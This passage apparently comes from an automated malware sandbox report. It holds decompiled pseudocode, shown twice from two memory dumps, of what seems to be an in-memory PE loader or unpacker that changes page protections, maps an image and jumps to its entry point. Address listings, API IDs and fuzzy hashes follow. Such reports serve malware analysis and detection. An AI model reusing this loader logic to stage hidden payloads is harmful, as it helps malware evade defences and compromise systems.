                                                                                                                                                				intOrPtr _v132;
                                                                                                                                                				char* _v136;
                                                                                                                                                				intOrPtr _v140;
                                                                                                                                                				intOrPtr _v144;
                                                                                                                                                				intOrPtr _v148;
                                                                                                                                                				intOrPtr _v152;
                                                                                                                                                				intOrPtr _v156;
                                                                                                                                                				int _v160;
                                                                                                                                                				intOrPtr _v164;
                                                                                                                                                				char* _v168;
                                                                                                                                                				intOrPtr _v172;
                                                                                                                                                				intOrPtr _v176;
                                                                                                                                                				char _v180;
                                                                                                                                                				intOrPtr* _t135;
                                                                                                                                                				int _t142;
                                                                                                                                                				int _t150;
                                                                                                                                                				int _t154;
                                                                                                                                                				intOrPtr _t169;
                                                                                                                                                				int _t175;
                                                                                                                                                				intOrPtr _t217;
                                                                                                                                                				void* _t224;
                                                                                                                                                				intOrPtr _t227;
                                                                                                                                                				void* _t234;
                                                                                                                                                				intOrPtr _t238;
                                                                                                                                                				intOrPtr _t245;
                                                                                                                                                				intOrPtr _t249;
                                                                                                                                                				DWORD* _t263;
                                                                                                                                                				void* _t267;
                                                                                                                                                				intOrPtr* _t270;
                                                                                                                                                				intOrPtr* _t271;
                                                                                                                                                
                                                                                                                                                				_t135 = _a4;
                                                                                                                                                				_v20 = 0;
                                                                                                                                                				_t234 =  *((intOrPtr*)(_t135 + 0x28));
                                                                                                                                                				 *0x5e4418 = 1;
                                                                                                                                                				asm("movaps xmm0, [0x5e3010]");
                                                                                                                                                				asm("movups [0x5e4428], xmm0");
                                                                                                                                                				_v48 = _t135;
                                                                                                                                                				_v52 =  *((intOrPtr*)(_t135 + 0x44));
                                                                                                                                                				_v56 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                                                                				_v180 = _t234;
                                                                                                                                                				_v176 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v172 = 4;
                                                                                                                                                				_v168 =  &_v20;
                                                                                                                                                				_v60 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                                                				_v64 = 4;
                                                                                                                                                				_v68 = _t234;
                                                                                                                                                				_v72 =  &_v20;
                                                                                                                                                				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
                                                                                                                                                				_v76 = _t142;
                                                                                                                                                				_v180 = _v68;
                                                                                                                                                				_v176 = 0;
                                                                                                                                                				_v172 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v80 = 0x400;
                                                                                                                                                				_v84 = 2;
                                                                                                                                                				_v88 =  &_v20;
                                                                                                                                                				_v92 = 0;
                                                                                                                                                				E005E173B();
                                                                                                                                                				E005E21C2(_v68,  *_v48, _v60);
                                                                                                                                                				E005E173B( *_v48, 0, _v60);
                                                                                                                                                				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                                                                				_t270 = _t267 - 0x84;
                                                                                                                                                				_t224 = _v68;
                                                                                                                                                				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
                                                                                                                                                				_v96 = _t150;
                                                                                                                                                				_v100 = _v68 + 0x3c;
                                                                                                                                                				_v104 = _t224;
                                                                                                                                                				_v108 = _t249;
                                                                                                                                                				if(_t249 != 0) {
                                                                                                                                                					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_v112 = _v104;
                                                                                                                                                				if(_v56 != 0) {
                                                                                                                                                					_v116 = 0;
                                                                                                                                                					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
                                                                                                                                                					while(1) {
                                                                                                                                                						_t169 = _v120;
                                                                                                                                                						_v152 = _t169;
                                                                                                                                                						_t245 = _v152;
                                                                                                                                                						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
                                                                                                                                                						_v176 =  *((intOrPtr*)(_t245 + 8));
                                                                                                                                                						_v172 =  *((intOrPtr*)(0x5e4418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
                                                                                                                                                						_v168 =  &_v20;
                                                                                                                                                						_v156 = _v116;
                                                                                                                                                						_t175 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                                						_t270 = _t270 - 0x10;
                                                                                                                                                						_t217 = _v156 + 1;
                                                                                                                                                						_v160 = _t175;
                                                                                                                                                						_v116 = _t217;
                                                                                                                                                						_v120 = _v152 + 0x28;
                                                                                                                                                						if(_t217 == _v56) {
                                                                                                                                                							goto L12;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				L12:
                                                                                                                                                				 *_t270 = _v68;
                                                                                                                                                				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
                                                                                                                                                				_t154 = DisableThreadLibraryCalls(??);
                                                                                                                                                				_t271 = _t270 - 4;
                                                                                                                                                				_t227 =  *_v100;
                                                                                                                                                				_v164 = _t154;
                                                                                                                                                				_v124 = _t227;
                                                                                                                                                				_v128 = _v68;
                                                                                                                                                				if(_t227 != 0) {
                                                                                                                                                					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_t238 = _v48;
                                                                                                                                                				_v44 =  *((intOrPtr*)(_t238 + 0x40));
                                                                                                                                                				_v40 =  *((intOrPtr*)(_t238 + 0x24));
                                                                                                                                                				_v36 =  *((intOrPtr*)(_t238 + 0x38));
                                                                                                                                                				_v32 =  *((intOrPtr*)(_t238 + 0x50));
                                                                                                                                                				_v28 =  *((intOrPtr*)(_t238 + 0x18));
                                                                                                                                                				_v24 = _v132;
                                                                                                                                                				 *_t271 = _t238;
                                                                                                                                                				_v180 = 0;
                                                                                                                                                				_v176 = 0x5c;
                                                                                                                                                				_v136 =  &_v44;
                                                                                                                                                				_v140 = 0;
                                                                                                                                                				_v144 = 0x5c;
                                                                                                                                                				_v148 =  *((intOrPtr*)(_v128 + 0x28));
                                                                                                                                                				E005E173B();
                                                                                                                                                				if(_v148 != 0) {
                                                                                                                                                					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
                                                                                                                                                					goto __eax;
                                                                                                                                                				}
                                                                                                                                                				return 1;
                                                                                                                                                			}





























































                                                                                                                                                0x005e1949
                                                                                                                                                0x005e1957
                                                                                                                                                0x005e195e
                                                                                                                                                0x005e1961
                                                                                                                                                0x005e196b
                                                                                                                                                0x005e1972
                                                                                                                                                0x005e197c
                                                                                                                                                0x005e1982
                                                                                                                                                0x005e198b
                                                                                                                                                0x005e1994
                                                                                                                                                0x005e1997
                                                                                                                                                0x005e199b
                                                                                                                                                0x005e19a3
                                                                                                                                                0x005e19aa
                                                                                                                                                0x005e19ad
                                                                                                                                                0x005e19b0
                                                                                                                                                0x005e19b3
                                                                                                                                                0x005e19b6
                                                                                                                                                0x005e19d0
                                                                                                                                                0x005e19d6
                                                                                                                                                0x005e19d9
                                                                                                                                                0x005e19e1
                                                                                                                                                0x005e19e5
                                                                                                                                                0x005e19e8
                                                                                                                                                0x005e19eb
                                                                                                                                                0x005e19ee
                                                                                                                                                0x005e19f1
                                                                                                                                                0x005e1a0c
                                                                                                                                                0x005e1a28
                                                                                                                                                0x005e1a4d
                                                                                                                                                0x005e1a4f
                                                                                                                                                0x005e1a58
                                                                                                                                                0x005e1a5b
                                                                                                                                                0x005e1a65
                                                                                                                                                0x005e1a68
                                                                                                                                                0x005e1a6b
                                                                                                                                                0x005e1a6e
                                                                                                                                                0x005e1a71
                                                                                                                                                0x005e1a8c
                                                                                                                                                0x005e1a8c
                                                                                                                                                0x005e1b76
                                                                                                                                                0x005e1b79
                                                                                                                                                0x005e1aa5
                                                                                                                                                0x005e1aa8
                                                                                                                                                0x005e1b84
                                                                                                                                                0x005e1b84
                                                                                                                                                0x005e1b9b
                                                                                                                                                0x005e1bc3
                                                                                                                                                0x005e1bcf
                                                                                                                                                0x005e1bd2
                                                                                                                                                0x005e1bd6
                                                                                                                                                0x005e1bda
                                                                                                                                                0x005e1be1
                                                                                                                                                0x005e1be7
                                                                                                                                                0x005e1be9
                                                                                                                                                0x005e1bf2
                                                                                                                                                0x005e1c03
                                                                                                                                                0x005e1c09
                                                                                                                                                0x005e1c0c
                                                                                                                                                0x005e1c0f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x005e1c11
                                                                                                                                                0x005e1b84
                                                                                                                                                0x005e1c31
                                                                                                                                                0x005e1c3f
                                                                                                                                                0x005e1c47
                                                                                                                                                0x005e1c4a
                                                                                                                                                0x005e1c4c
                                                                                                                                                0x005e1c52
                                                                                                                                                0x005e1c5e
                                                                                                                                                0x005e1c64
                                                                                                                                                0x005e1c67
                                                                                                                                                0x005e1c6a
                                                                                                                                                0x005e1ae4
                                                                                                                                                0x005e1ae4
                                                                                                                                                0x005e1af7
                                                                                                                                                0x005e1afd
                                                                                                                                                0x005e1b03
                                                                                                                                                0x005e1b09
                                                                                                                                                0x005e1b0f
                                                                                                                                                0x005e1b15
                                                                                                                                                0x005e1b1b
                                                                                                                                                0x005e1b1e
                                                                                                                                                0x005e1b21
                                                                                                                                                0x005e1b29
                                                                                                                                                0x005e1b31
                                                                                                                                                0x005e1b37
                                                                                                                                                0x005e1b3d
                                                                                                                                                0x005e1b43
                                                                                                                                                0x005e1b49
                                                                                                                                                0x005e1b57
                                                                                                                                                0x005e1c24
                                                                                                                                                0x005e1c2a
                                                                                                                                                0x005e1c2a
                                                                                                                                                0x005e1ac9

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.507570796.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID: \
                                                                                                                                                • API String ID: 544645111-2967466578
                                                                                                                                                • Opcode ID: a3d5c846a3cbfeeb9128e1b39fd2cf351d53097bcd9240b18aa6bf1cbf75b72f
                                                                                                                                                • Instruction ID: cac1e4d2daeee87dd63d8a1cc611f1803db73814b24b005e189fc61d274790f0
                                                                                                                                                • Opcode Fuzzy Hash: a3d5c846a3cbfeeb9128e1b39fd2cf351d53097bcd9240b18aa6bf1cbf75b72f
                                                                                                                                                • Instruction Fuzzy Hash: E8B19DB4E007198FCB14CF99C980A9DBBF1BF88310F1585AAD959AB351D330A941CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.507570796.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                                                                • Instruction ID: dbb863435dac2ef0b87473721748f74343ae302008ce6ad433b32358fb68414a
                                                                                                                                                • Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                                                                • Instruction Fuzzy Hash: 7741C3B5E0461A9FDB08CFA9C4946AEBBF1FF88714F14852DE848AB340D375A841CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Executed Functions

                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                			E0340193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
                                                                                                                                                				char _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				char _v44;
                                                                                                                                                				intOrPtr* _v48;
                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                				void* _v68;
                                                                                                                                                				char* _v72;
                                                                                                                                                				int _v76;
                                                                                                                                                				long _v80;
                                                                                                                                                				long _v84;
                                                                                                                                                				DWORD* _v88;
                                                                                                                                                				intOrPtr _v92;
                                                                                                                                                				int _v96;
                                                                                                                                                				intOrPtr* _v100;
                                                                                                                                                				intOrPtr _v104;
                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                				intOrPtr _v116;
                                                                                                                                                				intOrPtr _v120;
                                                                                                                                                				intOrPtr _v124;
                                                                                                                                                				void* _v128;
                                                                                                                                                				intOrPtr _v132;
                                                                                                                                                				char* _v136;
                                                                                                                                                				intOrPtr _v140;
                                                                                                                                                				intOrPtr _v144;
                                                                                                                                                				intOrPtr _v148;
                                                                                                                                                				intOrPtr _v152;
                                                                                                                                                				intOrPtr _v156;
                                                                                                                                                				int _v160;
                                                                                                                                                				intOrPtr _v164;
                                                                                                                                                				char* _v168;
                                                                                                                                                				intOrPtr _v172;
                                                                                                                                                				intOrPtr _v176;
                                                                                                                                                				char _v180;
                                                                                                                                                				intOrPtr* _t135;
                                                                                                                                                				int _t142;
                                                                                                                                                				int _t150;
                                                                                                                                                				int _t154;
                                                                                                                                                				intOrPtr _t169;
                                                                                                                                                				int _t175;
                                                                                                                                                				intOrPtr _t217;
                                                                                                                                                				void* _t224;
                                                                                                                                                				intOrPtr _t227;
                                                                                                                                                				void* _t234;
                                                                                                                                                				intOrPtr _t238;
                                                                                                                                                				intOrPtr _t245;
                                                                                                                                                				intOrPtr _t249;
                                                                                                                                                				DWORD* _t263;
                                                                                                                                                				void* _t267;
                                                                                                                                                				intOrPtr* _t270;
                                                                                                                                                				intOrPtr* _t271;
                                                                                                                                                
                                                                                                                                                				_t135 = _a4;
                                                                                                                                                				_v20 = 0;
                                                                                                                                                				_t234 =  *((intOrPtr*)(_t135 + 0x28));
                                                                                                                                                				 *0x3404418 = 1;
                                                                                                                                                				asm("movaps xmm0, [0x3403010]");
                                                                                                                                                				asm("movups [0x3404428], xmm0");
                                                                                                                                                				_v48 = _t135;
                                                                                                                                                				_v52 =  *((intOrPtr*)(_t135 + 0x44));
                                                                                                                                                				_v56 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                                                                				_v180 = _t234;
                                                                                                                                                				_v176 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v172 = 4;
                                                                                                                                                				_v168 =  &_v20;
                                                                                                                                                				_v60 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                                                				_v64 = 4;
                                                                                                                                                				_v68 = _t234;
                                                                                                                                                				_v72 =  &_v20;
                                                                                                                                                				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
                                                                                                                                                				_v76 = _t142;
                                                                                                                                                				_v180 = _v68;
                                                                                                                                                				_v176 = 0;
                                                                                                                                                				_v172 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v80 = 0x400;
                                                                                                                                                				_v84 = 2;
                                                                                                                                                				_v88 =  &_v20;
                                                                                                                                                				_v92 = 0;
                                                                                                                                                				E0340173B();
                                                                                                                                                				E034021C2(_v68,  *_v48, _v60);
                                                                                                                                                				E0340173B( *_v48, 0, _v60);
                                                                                                                                                				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                                                                				_t270 = _t267 - 0x84;
                                                                                                                                                				_t224 = _v68;
                                                                                                                                                				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
                                                                                                                                                				_v96 = _t150;
                                                                                                                                                				_v100 = _v68 + 0x3c;
                                                                                                                                                				_v104 = _t224;
                                                                                                                                                				_v108 = _t249;
                                                                                                                                                				if(_t249 != 0) {
                                                                                                                                                					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_v112 = _v104;
                                                                                                                                                				if(_v56 != 0) {
                                                                                                                                                					_v116 = 0;
                                                                                                                                                					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
                                                                                                                                                					while(1) {
                                                                                                                                                						_t169 = _v120;
                                                                                                                                                						_v152 = _t169;
                                                                                                                                                						_t245 = _v152;
                                                                                                                                                						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
                                                                                                                                                						_v176 =  *((intOrPtr*)(_t245 + 8));
                                                                                                                                                						_v172 =  *((intOrPtr*)(0x3404418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
                                                                                                                                                						_v168 =  &_v20;
                                                                                                                                                						_v156 = _v116;
                                                                                                                                                						_t175 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                                						_t270 = _t270 - 0x10;
                                                                                                                                                						_t217 = _v156 + 1;
                                                                                                                                                						_v160 = _t175;
                                                                                                                                                						_v116 = _t217;
                                                                                                                                                						_v120 = _v152 + 0x28;
                                                                                                                                                						if(_t217 == _v56) {
                                                                                                                                                							goto L12;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				L12:
                                                                                                                                                				 *_t270 = _v68;
                                                                                                                                                				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
                                                                                                                                                				_t154 = DisableThreadLibraryCalls(??);
                                                                                                                                                				_t271 = _t270 - 4;
                                                                                                                                                				_t227 =  *_v100;
                                                                                                                                                				_v164 = _t154;
                                                                                                                                                				_v124 = _t227;
                                                                                                                                                				_v128 = _v68;
                                                                                                                                                				if(_t227 != 0) {
                                                                                                                                                					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_t238 = _v48;
                                                                                                                                                				_v44 =  *((intOrPtr*)(_t238 + 0x40));
                                                                                                                                                				_v40 =  *((intOrPtr*)(_t238 + 0x24));
                                                                                                                                                				_v36 =  *((intOrPtr*)(_t238 + 0x38));
                                                                                                                                                				_v32 =  *((intOrPtr*)(_t238 + 0x50));
                                                                                                                                                				_v28 =  *((intOrPtr*)(_t238 + 0x18));
                                                                                                                                                				_v24 = _v132;
                                                                                                                                                				 *_t271 = _t238;
                                                                                                                                                				_v180 = 0;
                                                                                                                                                				_v176 = 0x5c;
                                                                                                                                                				_v136 =  &_v44;
                                                                                                                                                				_v140 = 0;
                                                                                                                                                				_v144 = 0x5c;
                                                                                                                                                				_v148 =  *((intOrPtr*)(_v128 + 0x28));
                                                                                                                                                				E0340173B();
                                                                                                                                                				if(_v148 != 0) {
                                                                                                                                                					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
                                                                                                                                                					goto __eax;
                                                                                                                                                				}
                                                                                                                                                				return 1;
                                                                                                                                                			}





























































                                                                                                                                                0x03401949
                                                                                                                                                0x03401957
                                                                                                                                                0x0340195e
                                                                                                                                                0x03401961
                                                                                                                                                0x0340196b
                                                                                                                                                0x03401972
                                                                                                                                                0x0340197c
                                                                                                                                                0x03401982
                                                                                                                                                0x0340198b
                                                                                                                                                0x03401994
                                                                                                                                                0x03401997
                                                                                                                                                0x0340199b
                                                                                                                                                0x034019a3
                                                                                                                                                0x034019aa
                                                                                                                                                0x034019ad
                                                                                                                                                0x034019b0
                                                                                                                                                0x034019b3
                                                                                                                                                0x034019b6
                                                                                                                                                0x034019d0
                                                                                                                                                0x034019d6
                                                                                                                                                0x034019d9
                                                                                                                                                0x034019e1
                                                                                                                                                0x034019e5
                                                                                                                                                0x034019e8
                                                                                                                                                0x034019eb
                                                                                                                                                0x034019ee
                                                                                                                                                0x034019f1
                                                                                                                                                0x03401a0c
                                                                                                                                                0x03401a28
                                                                                                                                                0x03401a4d
                                                                                                                                                0x03401a4f
                                                                                                                                                0x03401a58
                                                                                                                                                0x03401a5b
                                                                                                                                                0x03401a65
                                                                                                                                                0x03401a68
                                                                                                                                                0x03401a6b
                                                                                                                                                0x03401a6e
                                                                                                                                                0x03401a71
                                                                                                                                                0x03401a8c
                                                                                                                                                0x03401a8c
                                                                                                                                                0x03401b76
                                                                                                                                                0x03401b79
                                                                                                                                                0x03401aa5
                                                                                                                                                0x03401aa8
                                                                                                                                                0x03401b84
                                                                                                                                                0x03401b84
                                                                                                                                                0x03401b9b
                                                                                                                                                0x03401bc3
                                                                                                                                                0x03401bcf
                                                                                                                                                0x03401bd2
                                                                                                                                                0x03401bd6
                                                                                                                                                0x03401bda
                                                                                                                                                0x03401be1
                                                                                                                                                0x03401be7
                                                                                                                                                0x03401be9
                                                                                                                                                0x03401bf2
                                                                                                                                                0x03401c03
                                                                                                                                                0x03401c09
                                                                                                                                                0x03401c0c
                                                                                                                                                0x03401c0f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x03401c11
                                                                                                                                                0x03401b84
                                                                                                                                                0x03401c31
                                                                                                                                                0x03401c3f
                                                                                                                                                0x03401c47
                                                                                                                                                0x03401c4a
                                                                                                                                                0x03401c4c
                                                                                                                                                0x03401c52
                                                                                                                                                0x03401c5e
                                                                                                                                                0x03401c64
                                                                                                                                                0x03401c67
                                                                                                                                                0x03401c6a
                                                                                                                                                0x03401ae4
                                                                                                                                                0x03401ae4
                                                                                                                                                0x03401af7
                                                                                                                                                0x03401afd
                                                                                                                                                0x03401b03
                                                                                                                                                0x03401b09
                                                                                                                                                0x03401b0f
                                                                                                                                                0x03401b15
                                                                                                                                                0x03401b1b
                                                                                                                                                0x03401b1e
                                                                                                                                                0x03401b21
                                                                                                                                                0x03401b29
                                                                                                                                                0x03401b31
                                                                                                                                                0x03401b37
                                                                                                                                                0x03401b3d
                                                                                                                                                0x03401b43
                                                                                                                                                0x03401b49
                                                                                                                                                0x03401b57
                                                                                                                                                0x03401c24
                                                                                                                                                0x03401c2a
                                                                                                                                                0x03401c2a
                                                                                                                                                0x03401ac9

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000012.00000002.512860984.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID: \
                                                                                                                                                • API String ID: 544645111-2967466578
                                                                                                                                                • Opcode ID: da45405eebafb0de22133273c22293cc62cdb3813724a29cad80d58e7c99bec2
                                                                                                                                                • Instruction ID: f9c46fcf88fdcc33385ba831ab75ca8bb610e2f6a867f8e134890975b7574ef3
                                                                                                                                                • Opcode Fuzzy Hash: da45405eebafb0de22133273c22293cc62cdb3813724a29cad80d58e7c99bec2
                                                                                                                                                • Instruction Fuzzy Hash: 0BB19BB8E042188FCB14CFA9C980A9DFBF1BF88314F55856AE959AB351D330A941CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000012.00000002.512860984.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                                                                • Instruction ID: e381b4269fe7af1a8ae3978c1d91cab49562d9cd6756df61c55d04edd2b9b267
                                                                                                                                                • Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                                                                • Instruction Fuzzy Hash: 7B41B2B5E042199FDB44CFA9C4906AEBBF1BF48714F14852ED858AB380D375A841CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions